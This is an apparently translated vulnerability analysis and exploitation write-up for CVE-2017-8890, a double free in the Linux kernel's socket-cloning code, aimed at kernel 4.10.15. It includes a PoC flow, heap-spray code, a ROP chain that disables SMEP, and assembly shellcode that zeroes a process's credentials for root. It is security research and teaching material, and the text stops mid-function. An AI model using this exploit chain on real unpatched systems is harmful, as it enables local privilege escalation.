[kernel exploit] CVE-2017-8890 Phoenix Talon vulnerability analysis and exploitation

Affected versions: Linux 2.5.69 to 4.10.15. Score 7.8; may lead to remote code execution. The bug stayed hidden for 11 years and was found with syzkaller.

Test version: Linux-4.10.15. Test environment download: https://github.com/bsauce/kernel_exploit_factory

Compilation options: CONFIG_E1000=y and CONFIG_E1000E=y

General setup -> Choose SLAB allocator (SLUB (Unqueued Allocator)) -> SLAB

$ wget https://mirrors.tuna.tsinghua.edu.cn/kernel/v4.x/linux-4.10.15.tar.xz
$ tar -xvf linux-4.10.15.tar.xz
$ cd linux-4.10.15
# KASAN: run make menuconfig and enable "Kernel hacking" -> "Memory Debugging" -> "KASAN: runtime memory debugger".
$ make -j32
$ make all
$ make modules
# The compiled bzImage is at arch/x86/boot/bzImage.

Vulnerability description: the function inet_csk_clone_lock() in net/ipv4/inet_connection_sock.c has a double-free vulnerability. When the server creates a socket and calls accept() to receive a connection, two pointers (mc_list) to the same ip_mc_socklist object exist. When the server closes both the listening socket and the inet_sock object created by accept(), the ip_mc_socklist object is released twice, resulting in a double free.

Patch: when the object is copied, the patch sets mc_list in the copy to NULL.

struct sock *inet_csk_clone_lock(const struct sock *sk,
				 const struct request_sock *req,
				 const gfp_t priority)
{
	struct sock *newsk = sk_clone_lock(sk, priority);  // Copies sk. Before the patch, mc_list is not reinitialized after the copy, so newsk and sk hold a pointer to the same ip_mc_socklist structure.

	if (newsk) {
		struct inet_connection_sock *newicsk = inet_csk(newsk);

		newsk->sk_state = TCP_SYN_RECV;
		newicsk->icsk_bind_hash = NULL;

		inet_sk(newsk)->inet_dport = inet_rsk(req)->ir_rmt_port;
		inet_sk(newsk)->inet_num = inet_rsk(req)->ir_num;
		inet_sk(newsk)->inet_sport = htons(inet_rsk(req)->ir_num);
		newsk->sk_write_space = sk_stream_write_space;

		/* listeners have SOCK_RCU_FREE, not the children */
		sock_reset_flag(newsk, SOCK_RCU_FREE);
        
		inet_sk(newsk)->mc_list = NULL;  // <------------------------ patch

		newsk->sk_mark = inet_rsk(req)->ir_mark;
		atomic64_set(&newsk->sk_cookie,
			     atomic64_read(&inet_rsk(req)->ir_cookie));

		newicsk->icsk_retransmits = 0;
		newicsk->icsk_backoff	  = 0;
		newicsk->icsk_probes_out  = 0;

		/* Deinitialize accept_queue to trap illegal accesses. */
		memset(&newicsk->icsk_accept_queue, 0, sizeof(newicsk->icsk_accept_queue));

		security_inet_csk_clone(newsk, req);
	}
	return newsk;
}
EXPORT_SYMBOL_GPL(inet_csk_clone_lock);

Protection mechanisms: SMEP is enabled; SMAP and KASLR are disabled.

Exploitation summary: there are two key points. First, the exploit hijacks the callback function pointer in the RCU structure, which requires understanding the RCU mechanism (see "RCU mechanism learning"). Second, privileges cannot be escalated with ROP alone, because the kernel is not running in the context of the exploit process when the callback fires; shellcode has to modify the uid of the exploit process directly. In short: the double free is used to overwrite the RCU callback function pointer, SMEP is disabled, and execution jumps to shellcode that modifies cred.

1. Create a socket on the server side so that the kernel creates the vulnerable ip_mc_socklist object;
2. A child thread creates the client socket and repeatedly connects to the server with connect();
3. The server accepts the client request with accept(), which copies the mc_list pointer;
4. A forged ip_mc_socklist structure is placed at user-space address 0x10000000a, together with the ROP chain (placed at the address given by the value of EAX when the xchg gadget executes; the ROP chain saves rbp to rbx and disables SMEP). A child thread repeatedly rewrites the func pointer, because the kernel overwrites func and the hijack would otherwise fail;
5. Close the socket created by accept() on the server, heap-spray to overwrite the ip_mc_socklist->next_rcu pointer (fixed value 0x10000000a), then close the server socket to trigger the double free.

1, Vulnerability principle

(1) Vulnerability principle

In socket programming, the socket created on the server side makes the kernel create an inet_sock structure, called sock1 here:

struct inet_sock {
	/* sk and pinet6 has to be the first two members of inet_sock */
	struct sock		sk;
    ............
	__be32			inet_saddr;
	__s16			uc_ttl;
	__u16			cmsg_flags;
	__be16			inet_sport;
	__u16			inet_id;
    .............
	__be32			mc_addr;
	struct ip_mc_socklist __rcu	*mc_list;		// Cause double free
	struct inet_cork_full	cork;
};

struct ip_mc_socklist {
	struct ip_mc_socklist __rcu *next_rcu;							// 0x8
	struct ip_mreqn		multi;										// 0xc
	unsigned int		sfmode;		/* MCAST_{INCLUDE,EXCLUDE} */	// 0x4
	struct ip_sf_socklist __rcu	*sflist;							// 0x8
	struct rcu_head		rcu;										// 0x10
};

When the server side calls accept() to take an incoming connection, the kernel creates a new inet_sock structure, called sock2 here. sock2 copies the ip_mc_socklist pointer (mc_list) from sock1; the structure is shown above.

At this point the kernel has two different inet_sock objects whose mc_list pointers point to the same ip_mc_socklist object. When the server later closes the listening socket, the kernel releases sock1 and with it the ip_mc_socklist object that mc_list points to. When the server closes sock2, created by accept(), the same ip_mc_socklist object is released again, resulting in a double free.
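The shared-pointer problem can be modelled in user space. The sketch below is not kernel code: `sock_model`, `mc_entry`, `clone_sock()` and `close_sock()` are hypothetical stand-ins for inet_sock, ip_mc_socklist, sk_clone_lock() and ip_mc_drop_socket(), and a counter replaces the real free so the program stays well-defined.

```c
#include <assert.h>
#include <stdlib.h>
#include <string.h>

/* Hypothetical stand-ins for ip_mc_socklist and inet_sock. */
struct mc_entry { int release_count; };
struct sock_model { struct mc_entry *mc_list; };

/* Byte-wise clone, as sk_clone_lock() effectively does. The patched
 * variant additionally clears mc_list in the child. */
static struct sock_model clone_sock(const struct sock_model *parent, int patched)
{
	struct sock_model child;

	memcpy(&child, parent, sizeof(child));
	if (patched)
		child.mc_list = NULL;
	return child;
}

/* Stand-in for ip_mc_drop_socket(): counts releases instead of freeing. */
static void close_sock(struct sock_model *s)
{
	if (!s->mc_list)
		return;
	s->mc_list->release_count++;
	s->mc_list = NULL;
}

/* Returns how many times the shared entry was released. */
static int releases_after_closing_both(int patched)
{
	struct mc_entry *entry = calloc(1, sizeof(*entry));
	struct sock_model sock1 = { .mc_list = entry };
	struct sock_model sock2;
	int count;

	assert(entry != NULL);
	sock2 = clone_sock(&sock1, patched);
	close_sock(&sock2);   /* socket returned by accept() */
	close_sock(&sock1);   /* listening socket */
	count = entry->release_count;
	free(entry);
	return count;
}
```

Calling `releases_after_closing_both(0)` models the vulnerable kernel (two releases of one object), while `releases_after_closing_both(1)` models the patched clone (one release).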

(2) Call chains for creating, copying, and releasing mc_list

The Understand tool can help generate call chains.

Create mc_list: entry_SYSCALL_64_fastpath() -> SyS_setsockopt() -> SYSC_setsockopt() -> sock_common_setsockopt() -> tcp_setsockopt() -> ip_setsockopt() -> do_ip_setsockopt() -> ip_mc_join_group() -> sock_kmalloc() -> kmalloc() (mc_list is allocated by the sock_kmalloc() call)

Copy mc_list: tcp_v4_rcv() -> tcp_check_req() -> tcp_v4_syn_recv_sock() -> tcp_create_openreq_child() -> inet_csk_clone_lock() -> sk_clone_lock()

Release mc_list: sock_close() -> sock_release() -> ip_mc_drop_socket() -> kfree_rcu() (the kernel crashes before kfree_rcu() is reached; the crash point is ip_mc_leave_src()) -> __kfree_rcu() -> kfree_call_rcu() -> __call_rcu(). The call chain that performs the real free is rcu_do_batch() -> __rcu_reclaim() (it checks whether the value of func is less than 4096; if so, func is treated as an offset and the object is freed, otherwise func is called).

mc_list is released in ip_mc_drop_socket(). Because mc_list is a singly linked list whose next element is reached through next_rcu, the release loops over the whole list. In addition, mc_list points to ip_mc_socklist structures, which are protected by the RCU mechanism (a structure protected by RCU contains a struct rcu_head rcu; member), so writes to this structure are special (a release can also be regarded as a write). When an RCU-protected structure is released, kfree_rcu() (kfree an object after a grace period) does not free it immediately; it calls __call_rcu() to add the object's rcu_head to a linked list of pending callbacks, and a grace period (GP) is started. When the grace period starts, all current reader threads are recorded. Once these readers have finished and a clock interrupt fires, the RCU callback is invoked in softirq context to delete the object.

In short: when a thread wants to write to (or delete and release) the object, a grace period starts. When all reader threads have finished, the grace period ends. A clock interrupt then checks whether a callback is pending and, if so, the RCU callback is invoked to delete the object. For a simple introduction to the RCU mechanism, see the article "RCU mechanism learning".
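The deferred release described above can be illustrated with a toy model. This is only a sketch under simplifying assumptions: a single global reader counter stands in for the kernel's grace-period tracking, and `model_call_rcu()` and `model_rcu_tick()` are hypothetical names, not kernel APIs.

```c
#include <assert.h>
#include <stddef.h>

struct cb_head {
	struct cb_head *next;
	void (*func)(struct cb_head *head);
};

static struct cb_head *pending;   /* callbacks waiting for the grace period */
static int active_readers;        /* readers that started before the update */
static int objects_freed;

static void free_cb(struct cb_head *head)
{
	(void)head;
	objects_freed++;
}

/* Model of call_rcu(): record the callback, do not run it yet. */
static void model_call_rcu(struct cb_head *head, void (*func)(struct cb_head *))
{
	assert(head != NULL);
	head->func = func;
	head->next = pending;
	pending = head;
}

/* Model of the softirq pass: run callbacks only once all readers are done. */
static void model_rcu_tick(void)
{
	if (active_readers > 0)
		return;
	while (pending) {
		struct cb_head *head = pending;

		pending = head->next;
		head->func(head);
	}
}

/* Returns 1 if nothing is freed while a reader is active and exactly one
 * callback runs after the reader has finished. */
static int demo_grace_period(void)
{
	struct cb_head obj = { 0 };
	int freed_before;

	pending = NULL;
	objects_freed = 0;
	active_readers = 1;
	model_call_rcu(&obj, free_cb);
	model_rcu_tick();             /* reader still active: nothing freed */
	freed_before = objects_freed;
	active_readers = 0;
	model_rcu_tick();             /* grace period over: callback runs */
	return freed_before == 0 && objects_freed == 1;
}
```

The gap between `model_call_rcu()` and the second `model_rcu_tick()` corresponds to the window that the rest of the write-up relies on.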

Crash: the second release crashes in ip_mc_drop_socket() -> ip_mc_leave_src() with an invalid (near-NULL) pointer dereference. After the first release of mc_list, the freed chunk may be reused by other threads. psf = iml->sflist, i.e. [mc_list+0x18]; sflist is a pointer to an ip_sf_socklist structure. Here rbx = psf = 0x2, so dereferencing psf->sl_count faults. If psf ([mc_list+0x18]) is 0, psf->sl_count is not dereferenced, and the kernel goes on to kfree_rcu() in ip_mc_drop_socket(), triggering the double free.

void ip_mc_drop_socket(struct sock *sk)
{
	struct inet_sock *inet = inet_sk(sk);
	struct ip_mc_socklist *iml;
	struct net *net = sock_net(sk);

	if (!inet->mc_list)
		return;

	rtnl_lock();
	while ((iml = rtnl_dereference(inet->mc_list)) != NULL) {			// Traverse the linked list and release
		struct in_device *in_dev;

		inet->mc_list = iml->next_rcu;
		in_dev = inetdev_by_index(net, iml->multi.imr_ifindex);
		(void) ip_mc_leave_src(sk, iml, in_dev);						// Crashes inside this call on the second release
		if (in_dev)
			ip_mc_dec_group(in_dev, iml->multi.imr_multiaddr.s_addr);
		/* decrease mem now to avoid the memleak warning */
		atomic_sub(sizeof(*iml), &sk->sk_omem_alloc);
		kfree_rcu(iml, rcu);											// point of release
	}
	rtnl_unlock();
}
// ip_mc_leave_src -- the function that crashes. After the first release of mc_list, the stale memory may already have been reused by other threads.
static int ip_mc_leave_src(struct sock *sk, struct ip_mc_socklist *iml,
			   struct in_device *in_dev)
{
	struct ip_sf_socklist *psf = rtnl_dereference(iml->sflist);
	int err;

	if (!psf) {															// test rbx, rbx
		/* any-source empty exclude case */
		return ip_mc_del_src(in_dev, &iml->multi.imr_multiaddr.s_addr,
			iml->sfmode, 0, NULL, 0);
	}
	err = ip_mc_del_src(in_dev, &iml->multi.imr_multiaddr.s_addr,		
			iml->sfmode, psf->sl_count, psf->sl_addr, 0);				// Crash point: mov ecx, DWORD PTR [rbx+0x4] dereferences an invalid pointer (psf->sl_count)
	RCU_INIT_POINTER(iml->sflist, NULL);
	/* decrease mem now to avoid the memleak warning */
	atomic_sub(IP_SFLSIZE(psf->sl_max), &sk->sk_omem_alloc);
	kfree_rcu(psf, rcu);
	return err;
}
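The [mc_list+0x18] offset quoted in the crash analysis can be checked with a user-space mirror of the structure. The `_m` types below are assumptions that copy the field order shown earlier and assume an x86-64 (LP64) target; they are not the kernel headers.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

static_assert(sizeof(void *) == 8, "layout below assumes a 64-bit target");

/* User-space mirrors of the kernel structures (assumed x86-64 layout). */
struct callback_head_m {
	struct callback_head_m *next;
	void (*func)(struct callback_head_m *head);
};

struct ip_mreqn_m {
	uint32_t imr_multiaddr;
	uint32_t imr_address;
	int32_t  imr_ifindex;
};

struct ip_mc_socklist_m {
	struct ip_mc_socklist_m *next_rcu;
	struct ip_mreqn_m        multi;
	unsigned int             sfmode;
	void                    *sflist;
	struct callback_head_m   rcu;
};

static size_t sflist_offset(void) { return offsetof(struct ip_mc_socklist_m, sflist); }
static size_t rcu_offset(void)    { return offsetof(struct ip_mc_socklist_m, rcu); }
static size_t socklist_size(void) { return sizeof(struct ip_mc_socklist_m); }
```

Under these assumptions sflist sits at 0x18, rcu at 0x20, and the whole object is 48 bytes, which matches the kmalloc-64 bucket mentioned later.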

(3) PoC

PoC flow:

	sockfd = socket(AF_INET, xx, IPPROTO_TCP);	// Create the server socket
	setsockopt(sockfd, SOL_IP, MCAST_JOIN_GROUP, xxxx, xxxx);	// The MCAST_JOIN_GROUP option makes the kernel create the ip_mc_socklist object
	bind(sockfd, xxxx, xxxx);
	listen(sockfd, xxxx);
	newsockfd = accept(sockfd, xxxx, xxxx);		// accept() creates a second socket whose mc_list pointer in the kernel points to the same ip_mc_socklist object
	close(newsockfd);	// First free (kfree_rcu): closes the new socket; the first kfree happens in the RCU callback once the grace period ends
	sleep(5);		// Wait for the RCU callback to perform the real free
	close(sockfd);		// Double free: closing the parent socket triggers the second free of the same object
2, Exploitation - ret2usr (SMEP/SMAP disabled)

(1) Hijacking control flow

Idea: after the first release, use a heap spray to reoccupy the freed chunk, so that the data seen during the second release is attacker-controlled, and hijack the control flow.

Function pointer: look again at the ip_mc_socklist object that is double-freed. It contains an rcu_head object (actually a callback_head structure), which holds a function pointer func. Releasing an ip_mc_socklist object goes through the RCU mechanism: there is a grace period after the release is requested, and the function that actually frees the ip_mc_socklist object is __rcu_reclaim().

struct ip_mc_socklist {
    struct ip_mc_socklist __rcu *next_rcu;
    struct ip_mreqn     multi;
    unsigned int        sfmode;     /* MCAST_{INCLUDE,EXCLUDE} */
    struct ip_sf_socklist __rcu *sflist;
    struct rcu_head     rcu;
};

struct callback_head {
    struct callback_head *next;
    void (*func)(struct callback_head *head);
};
#define rcu_head callback_head

static inline bool __rcu_reclaim(const char *rn, struct rcu_head *head)
{
	unsigned long offset = (unsigned long)head->func;

	rcu_lock_acquire(&rcu_callback_map);
	if (__is_kfree_rcu_offset(offset)) {
		RCU_TRACE(trace_rcu_invoke_kfree_callback(rn, head, offset));
		kfree((void *)head - offset);
		rcu_lock_release(&rcu_callback_map);
		return true;
	} else {
		RCU_TRACE(trace_rcu_invoke_callback(rn, head));
		head->func(head);			// Calls the callback func stored in the rcu_head object, so the goal is to hijack the rcu_head object.
		rcu_lock_release(&rcu_callback_map);
		return false;
	}
}
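The dual use of func (either a small offset or a real callback address) can be sketched in user space. This is a simplified model, not the kernel implementation: `model_reclaim()` only records the pointer that the kernel would pass to kfree(), and `tracked_obj` is a hypothetical object type.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

struct cb_head {
	struct cb_head *next;
	void (*func)(struct cb_head *head);
};

struct tracked_obj {
	long payload[4];
	struct cb_head rcu;
};

static void *last_released;   /* object base that would be passed to kfree() */
static int callbacks_called;

static void real_callback(struct cb_head *head)
{
	(void)head;
	callbacks_called++;
}

/* Mirrors the kernel check: values below 4096 are kfree_rcu() offsets. */
static int is_kfree_offset(uintptr_t v) { return v < 4096; }

static int model_reclaim(struct cb_head *head)
{
	uintptr_t offset;

	assert(head != NULL);
	offset = (uintptr_t)head->func;
	if (is_kfree_offset(offset)) {
		last_released = (char *)head - offset;  /* kernel calls kfree() here */
		return 1;
	}
	head->func(head);                           /* attacker-relevant branch */
	return 0;
}

/* Returns 1 if both branches behave as described. */
static int demo_reclaim(void)
{
	struct tracked_obj a, b;

	/* kfree_rcu() style: func holds offsetof(type, rcu), not an address. */
	a.rcu.func = (void (*)(struct cb_head *))(uintptr_t)offsetof(struct tracked_obj, rcu);
	b.rcu.func = real_callback;

	callbacks_called = 0;
	return model_reclaim(&a.rcu) == 1 && last_released == (void *)&a &&
	       model_reclaim(&b.rcu) == 0 && callbacks_called == 1;
}
```

Any func value of 4096 or more takes the call branch, which is why a forged pointer in that field leads to control-flow hijacking.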

(2) Heap spray function

Idea: the ip_mc_socklist object is 48 bytes, so it is allocated from kmalloc-64. As a first attempt, a modified ipv6_mc_socklist object is used for the heap spray. When the addr of the sprayed ipv6_mc_socklist object is set to ff02:abcd:0:0:0:0:0:1, the first 8 bytes of the sprayed object are 0x00000000cdab02ff, and these 8 bytes land exactly on the next_rcu member of the double-freed ip_mc_socklist object.

// Before modification: each of the two 4-byte int members is padded to 8 bytes for alignment, so the ipv6_mc_socklist structure is 72 bytes.
struct ipv6_mc_socklist {
	struct in6_addr		addr;
	int			ifindex;
	struct ipv6_mc_socklist __rcu *next;
	rwlock_t		sflock;
	unsigned int		sfmode;		/* MCAST_{INCLUDE,EXCLUDE} */
	struct ip6_sf_socklist	*sflist;
	struct rcu_head		rcu;
};
// After modification: with the two int members placed next to each other, the structure is 64 bytes when allocated.
struct ipv6_mc_socklist {
    struct in6_addr     addr;
    int         ifindex;
    unsigned int        sfmode;     /* MCAST_{INCLUDE,EXCLUDE} */
    struct ipv6_mc_socklist __rcu *next;
    rwlock_t        sflock;
    struct ip6_sf_socklist  *sflist;
    struct rcu_head     rcu;
};
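The 72-byte and 64-byte figures, and the 0x00000000cdab02ff value, can be reproduced in user space. The mirror types below are assumptions: `rwlock_m` stands in for rwlock_t and is assumed to be 8 bytes (no lock debugging), pointers are 8 bytes, and the host is little-endian.

```c
#include <assert.h>
#include <arpa/inet.h>
#include <netinet/in.h>
#include <stdint.h>
#include <string.h>

static_assert(sizeof(void *) == 8, "sizes below assume a 64-bit target");

struct cb_head_m { void *next; void *func; };
typedef struct { uint32_t cnts; uint32_t wait_lock; } rwlock_m;  /* assumed 8 bytes */

struct ipv6_mc_before {
	struct in6_addr  addr;
	int              ifindex;
	void            *next;
	rwlock_m         sflock;
	unsigned int     sfmode;
	void            *sflist;
	struct cb_head_m rcu;
};

struct ipv6_mc_after {
	struct in6_addr  addr;
	int              ifindex;
	unsigned int     sfmode;
	void            *next;
	rwlock_m         sflock;
	void            *sflist;
	struct cb_head_m rcu;
};

/* First 8 bytes of a textual IPv6 address, read as a host-order integer.
 * Returns 0 if the text cannot be parsed. */
static uint64_t first_qword(const char *text)
{
	struct in6_addr a;
	uint64_t q = 0;

	if (inet_pton(AF_INET6, text, &a) != 1)
		return 0;
	memcpy(&q, &a, sizeof(q));
	return q;
}
```

With these assumptions `sizeof(struct ipv6_mc_before)` is 72, `sizeof(struct ipv6_mc_after)` is 64, and `first_qword("ff02:abcd:0:0:0:0:0:1")` gives the value that overlaps next_rcu.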

(3) Hijack EIP

Problem: the spray overwrites the func function pointer in the ip_mc_socklist structure, but by the time __rcu_reclaim() actually runs, func has been overwritten again. It turns out that kfree_rcu() itself writes to the function pointer in the ip_mc_socklist object, which defeats the heap spray. kfree_rcu() call chain: kfree_rcu() -> __kfree_rcu() -> kfree_call_rcu() -> __call_rcu().

#define kfree_rcu(ptr, rcu_head)					\
	__kfree_rcu(&((ptr)->rcu_head), offsetof(typeof(*(ptr)), rcu_head)) // <---------- 

static void __call_rcu(struct rcu_head *head, rcu_callback_t func,
	   struct rcu_state *rsp, int cpu, bool lazy)
{
	unsigned long flags;
	struct rcu_data *rdp;

	/* Misaligned rcu_head! */
	WARN_ON_ONCE((unsigned long)head & (sizeof(void *) - 1));

	if (debug_rcu_head_queue(head)) {
		/* Probable double call_rcu(), so leak the callback. */
		WRITE_ONCE(head->func, rcu_leak_callback);
		WARN_ONCE(1, "__call_rcu(): Leaked duplicate callback\n");
		return;
	}
	head->func = func;				// <---------------- func is overwritten with an offset, i.e. the result of the offsetof() above
	head->next = NULL;

Solution: EIP therefore cannot be hijacked by spraying the function pointer directly. However, with the Linux RCU mechanism, __rcu_reclaim() does not perform the real release immediately after kfree_rcu() is called; the CPU executes it after a grace period. If the function pointer in the ip_mc_socklist object can be modified again before __rcu_reclaim() runs, EIP can be hijacked, and that is possible if the ip_mc_socklist object lives in user space. The first 8 bytes of the ip_mc_socklist object are the next_rcu pointer, which points to the next ip_mc_socklist object, so the objects form a linked list through next_rcu. By hijacking next_rcu so that it points to a forged ip_mc_socklist object in user space, EIP can then be hijacked by forging the function pointer of that user-space object. The layout is as follows:

Once the ip_mc_socklist object has been redirected to user space, a thread can rewrite the func pointer of the forged object in a loop, and EIP is hijacked.

(4) Shellcode

Problem: commit_creds(prepare_kernel_cred(0)) is the usual way to escalate privileges, but it only works if the kernel is running in the context of the exploit process, that is, the task_struct returned by the current macro must belong to the exploit process; otherwise the escalation fails. Debugging shows that when EIP is hijacked the kernel is in the context of the ksoftirqd or rcu_sched process. Presumably this is because, with the RCU mechanism, the real release of the ip_mc_socklist object happens in softirq processing, so the hijacked EIP also runs in that context. So although EIP can be hijacked, simply calling commit_creds() does not escalate privileges, and custom shellcode is needed. The following code is to be executed in the kernel:

// find_get_pid() and pid_task() are functions exported by the kernel; they look up the process descriptor (task_struct) for a given pid.
void get_root(int pid){

      struct pid * kpid = find_get_pid(pid); 
      struct task_struct * task = pid_task(kpid,PIDTYPE_PID); 
      unsigned int * addr = (unsigned  int* )task->cred;

      addr[1] = 0;
      addr[2] = 0;
      addr[3] = 0;
      addr[4] = 0;
      addr[5] = 0;
      addr[6] = 0;
      addr[7] = 0;
      addr[8] = 0;
}
// This code runs in the kernel. It can be compiled and run inside a kernel module, but it is not easy to compile as user-space code, so it is converted directly into assembly:
unsigned long*  find_get_pid = (unsigned long*)0xffffffff81077220;
unsigned long*  pid_task     = (unsigned long*)0xffffffff81077180;
int pid = getpid();
void get_root() {

        asm(
        "sub    $0x18,%rsp;"
        "mov    pid,%edi;"
        "callq  *find_get_pid;"
        "mov    %rax,-0x8(%rbp);"
        "mov    -0x8(%rbp),%rax;"
        "mov    $0x0,%esi;"
        "mov    %rax,%rdi;"
        "callq  *pid_task;"
        "mov    %rax,-0x10(%rbp);"
        "mov    -0x10(%rbp),%rax;"
        "mov    0x5f8(%rax),%rax;"
        "mov    %rax,-0x18(%rbp);"
        "mov    -0x18(%rbp),%rax;"
        "add    $0x4,%rax;"
        "movl   $0x0,(%rax);"
        "mov    -0x18(%rbp),%rax;"
        "add    $0x8,%rax;"
        "movl   $0x0,(%rax);"
        "mov    -0x18(%rbp),%rax;"
        "add    $0xc,%rax;"
        "movl   $0x0,(%rax);"
        "mov    -0x18(%rbp),%rax;"
        "add    $0x10,%rax;"
        "movl   $0x0,(%rax);"
        "mov    -0x18(%rbp),%rax;"
        "add    $0x14,%rax;"
        "movl   $0x0,(%rax);"
        "mov    -0x18(%rbp),%rax;"
        "add    $0x18,%rax;"
        "movl   $0x0,(%rax);"
        "mov    -0x18(%rbp),%rax;"
        "add    $0x1c,%rax;"
        "movl   $0x0,(%rax);"
        "mov    -0x18(%rbp),%rax;"
        "add    $0x20,%rax;"
        "movl   $0x0,(%rax);"
        "nop;"
        "leaveq;" 
        "retq   ;");

}
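The addr[1] to addr[8] writes in get_root(), and the 0x4 to 0x20 offsets in the assembly, line up with the eight ID fields at the start of struct cred. The mirror below is an assumption about that layout (a 4-byte usage counter followed by eight 32-bit IDs, without CONFIG_DEBUG_CREDENTIALS); it is a user-space illustration only.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

static_assert(sizeof(unsigned int) == 4, "offsets below assume 32-bit IDs");

/* Assumed mirror of the first fields of struct cred. */
struct cred_prefix {
	int          usage;   /* atomic_t in the kernel */
	unsigned int uid, gid, suid, sgid, euid, egid, fsuid, fsgid;
};

/* Zeroes the eight ID fields, i.e. 32-bit words 1..8 of the structure. */
static void zero_ids(struct cred_prefix *c)
{
	memset((char *)c + offsetof(struct cred_prefix, uid), 0,
	       8 * sizeof(unsigned int));
}

/* Returns 1 if usage is untouched and the IDs are all zero afterwards. */
static int demo_zero_ids(void)
{
	struct cred_prefix c = { 3, 1000, 1000, 1000, 1000, 1000, 1000, 1000, 1000 };

	zero_ids(&c);
	return c.usage == 3 && c.uid == 0 && c.gid == 0 && c.suid == 0 &&
	       c.sgid == 0 && c.euid == 0 && c.egid == 0 && c.fsuid == 0 &&
	       c.fsgid == 0;
}
```

Word 0 (the usage counter) is deliberately left alone, which is why the original code starts at index 1.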

3, Bypass SMEP

(1) Bypass SMEP

Idea: a stack pivot with the gadget xchg eax, esp jumps to the ROP chain placed in user space. The following two gadgets then modify bit 20 of the cr4 register; clearing it to 0 disables SMEP. With SMEP disabled, execution can jump to the shellcode in user space.

pop rdi; ret
mov cr4, rdi; pop rbp; ret
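The value loaded into rdi is simply the current cr4 value with bit 20 cleared. A minimal sketch of that bit arithmetic follows; the sample value 0x1006f0 used in the note is illustrative only and has to be read from the target system.

```c
#include <assert.h>
#include <stdint.h>

#define CR4_SMEP_BIT 20

static_assert(CR4_SMEP_BIT < 64, "bit index must fit in a 64-bit register");

/* Returns cr4 with the SMEP bit cleared; all other bits are preserved. */
static uint64_t cr4_without_smep(uint64_t cr4)
{
	return cr4 & ~(UINT64_C(1) << CR4_SMEP_BIT);
}

/* Returns 1 if the SMEP bit is set in the given cr4 value. */
static int smep_enabled(uint64_t cr4)
{
	return (int)((cr4 >> CR4_SMEP_BIT) & 1);
}
```

For example, `cr4_without_smep(0x1006f0)` yields 0x6f0.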

(2) Heap spray

Requirement: the kernel cannot be modified this time, so an existing object must be used for the heap spray. The sprayed object must be 64 bytes and its first 8 bytes must be controllable; the values of the other bytes must not affect the kernel execution flow.

Heap spray path: spraying with sendmmsg failed because the first 8 bytes could not be controlled. A suitable call path was eventually found in the call graph of sock_kmalloc().

ip_mc_source() -> sock_kmalloc(): debugging shows that a 64-byte heap chunk is allocated here, that its first 8 bytes are fixed at 0x000000010000000a, and that the other bytes are 0, which does not affect the kernel execution flow. Although the first 8 bytes cannot be controlled, that value is a user-space address that can be mapped with mmap, so this heap spray method works.

	if (!psl || psl->sl_count == psl->sl_max) {
		struct ip_sf_socklist *newpsl;
		int count = IP_SFBLOCK;

		if (psl)
			count += psl->sl_max;
		newpsl = sock_kmalloc(sk, IP_SFLSIZE(count), GFP_KERNEL);
		if (!newpsl) {
			err = -ENOBUFS;
			goto done;
		}
		newpsl->sl_max = count;
		newpsl->sl_count = count - IP_SFBLOCK;
		if (psl) {
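Both the 64-byte size and the fixed 0x000000010000000a prefix follow from the structure layout. The sketch below mirrors struct ip_sf_socklist in user space under a few assumptions: x86-64 layout, IP_SFBLOCK equal to 10, and sl_count having become 1 once the first source address is stored.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

static_assert(sizeof(void *) == 8, "layout below assumes a 64-bit target");

#define IP_SFBLOCK_M 10   /* assumed value of the kernel's IP_SFBLOCK */

/* Assumed mirror of struct ip_sf_socklist. */
struct ip_sf_socklist_m {
	unsigned int sl_max;
	unsigned int sl_count;
	struct { void *next; void *func; } rcu;
	uint32_t     sl_addr[];
};

#define IP_SFLSIZE_M(count) \
	(sizeof(struct ip_sf_socklist_m) + (count) * sizeof(uint32_t))

/* First 8 bytes of a fresh list after one source address was added,
 * read as a little-endian 64-bit value. */
static uint64_t first_qword_after_one_source(void)
{
	struct ip_sf_socklist_m hdr;
	uint64_t q;

	memset(&hdr, 0, sizeof(hdr));
	hdr.sl_max = IP_SFBLOCK_M;   /* low 32 bits: 0x0000000a */
	hdr.sl_count = 1;            /* high 32 bits: 0x00000001 */
	memcpy(&q, &hdr, sizeof(q));
	return q;
}
```

Here `IP_SFLSIZE_M(IP_SFBLOCK_M)` is 24 + 10 * 4 = 64, so the allocation lands in the same 64-byte cache as the freed ip_mc_socklist object.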

Heap spray code: the address of the forged user-space ip_mc_socklist structure has to be changed accordingly.

#define Heap_Spray_Addr            0x000000010000000a
int sockfd[SPRAY_SIZE];
void spray_init() {
    struct sockaddr_in server_addr;
    struct group_req group;
    struct sockaddr_in *psin=NULL;

    memset(&server_addr,0,sizeof(server_addr));
    memset(&group,0,sizeof(group));

    bzero(&server_addr,sizeof(server_addr));
    server_addr.sin_family = AF_INET;
    server_addr.sin_addr.s_addr = htonl(INADDR_ANY);   // s_addr is 32 bits wide, so htonl() is the matching conversion
    server_addr.sin_port = htons(HELLO_WORLD_SERVER_PORT);

    psin = (struct sockaddr_in *)&group.gr_group;
    psin->sin_family = AF_INET;
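    // inet_addr() already returns network byte order; the extra htonl() reverses the bytes on a little-endian host, so the group actually joined is 224.2.10.10 (a multicast address).
    psin->sin_addr.s_addr = htonl(inet_addr("10.10.2.224"));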

    for(int i=0; i<SPRAY_SIZE; i++) {
        if ((sockfd[i] = socket(PF_INET6, SOCK_STREAM, 0)) < 0) {      
           perror("Socket");
           exit(errno);
        }

        setsockopt(sockfd[i], SOL_IP, MCAST_JOIN_GROUP, &group, sizeof (group));
    }

}

void heap_spray(){
    struct ip_mreq_source mreqsrc;
    memset(&mreqsrc,0,sizeof(mreqsrc));
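    // Same byte-reversal as in spray_init(): this selects the group 224.2.10.10 on a little-endian host.
    mreqsrc.imr_multiaddr.s_addr = htonl(inet_addr("10.10.2.224"));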

    for(int j=0; j<SPRAY_SIZE; j++) {     
        setsockopt(sockfd[j], IPPROTO_IP, IP_ADD_SOURCE_MEMBERSHIP, &mreqsrc, sizeof(mreqsrc));
    }

}
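The expression htonl(inet_addr("10.10.2.224")) in the spray code looks like a mistake, because inet_addr() already returns a value in network byte order. On a little-endian host the extra htonl() reverses the four bytes, so the effective address is a multicast one. The helper names below are hypothetical; the sketch only demonstrates that byte reversal.

```c
#include <assert.h>
#include <arpa/inet.h>
#include <netinet/in.h>
#include <string.h>

/* Writes the dotted-quad form of htonl(inet_addr(text)) into out.
 * Returns out on success, NULL on failure. */
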